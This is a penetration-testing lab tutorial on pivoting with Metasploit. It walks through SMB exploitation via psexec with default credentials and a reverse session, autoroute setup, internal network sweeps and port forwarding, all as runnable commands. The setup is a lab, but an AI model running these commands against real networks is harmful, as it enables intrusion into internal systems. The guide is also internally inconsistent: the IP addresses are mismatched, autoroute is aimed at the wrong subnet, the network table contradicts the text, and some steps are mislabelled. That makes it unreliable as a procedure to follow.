1. Introduction
Pivoting is a crucial technique in penetration testing that allows attackers to access internal networks that are not directly reachable from their attacking machine. This guide covers step-by-step instructions on how to use Metasploit Framework to achieve pivoting, including all necessary commands.
2. Lab Setup
Virtual Machines Required:
- Kali Linux (Attacker Machine)
- Windows (Pivot Machine) – Connected to both DMZ and Internal Network
- Basic Pentesting 1 (Internal Network Machine)
Kali linux : https://cdimage.kali.org/kali-2025.1a/kali-linux-2025.1a-virtualbox-amd64.7z
Windows : https://drive.google.com/uc?id=1-cDEpDRl5_-QWBU8Ckpp_Zep-1-9-EY4&export=download
Basic Pentesting 1: https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova
Network Configuration:
| Network | IP Range | Machine |
| DMZ | 192.168.56.0/24 | Kali Linux & Metasploitable-3 |
| Internal | 192.168.138.0/24 | Windows & Basic Pentesting 1 |
The attacker’s Kali Linux machine has access only to the DMZ network, while the target Basic Pentesting 1 machine is in the internal network and not directly accessible.
3. Step-by-Step Exploitation and Pivoting Process
Step 1: Scanning and Identifying the Pivot Host
- Identify available machines in the DMZ network using nmap:
- netdiscover
- Scan open ports on Metasploitable-3:
- nmap -p- 192.168.56.101 –open
- Identify SMB service:
- nmap -p 445 –script smb-os-discovery 192.168.56.101
Step 2: Exploiting the Windows Machine
- Open Metasploit:
- msfconsole
- Select and configure the psexec module to exploit SMB:
- use exploit/windows/smb/psexec
- set RHOSTS 192.168.50.101
- set SMBUser vagrant
- set SMBPass vagrant
- set LHOST eth0
- set LPORT 4444
- exploit
- Once exploited, verify access:
- sysinfo
- ipconfig
Expected Output: Should show network interfaces connected to both DMZ and Internal Network.
Step 3: Setting Up Pivoting (Autoroute)
- Background the session:
- background
- Check existing sessions:
- sessions -i
- Use the autoroute module:
- use post/multi/manage/autoroute
- set SESSION 1
- set SUBNET 192.168.56.0/24
- run
- Verify routing setup:
- route print
Step 4: Scanning the Internal Network
- Ping sweep to find active hosts:
- use auxiliary/scanner/discovery/arp_sweep
- set RHOSTS 192.168.138.0 /24
- run
- Scan open ports on discovered internal hosts:
- use post/multi/gather/ping_sweep
- set RHOSTS 192.168.138.0/24
- set SESSION 1
- run
Step 5: Exploiting the Internal Network
- Use Metasploit’s to attack an internal host:
- use auxiliary/scanner/portscan/tcp
- set RHOSTS 192.168.138.103
- run
Step 6: Port Forwarding (Access Internal Services)
- Forward an internal web server port to the attacker’s machine:
- sessions -i 1
- portfwd add -l 8080 -p 80 -r 192.168.138.103
- portfwd add -l 2222 -p 22 -r 192.168.138.103
- Now, access the internal web server at http://127.0.0.1:8080 on Kali.
Then use Remote Desktop Client:
rdesktop 127.0.0.1
4. Summary & Key Takeaways
- Pivoting allows access to networks that are not directly reachable from the attacker’s machine.
- Metasploit’s autoroute module is used to establish network routes via a compromised host.
- Port forwarding enables access to internal services through a pivot machine.
- Scanning and enumeration of the internal network are crucial before exploitation.
This guide provides a structured approach to pivoting, ensuring complete network compromise through an efficient and tactical penetration testing methodology.
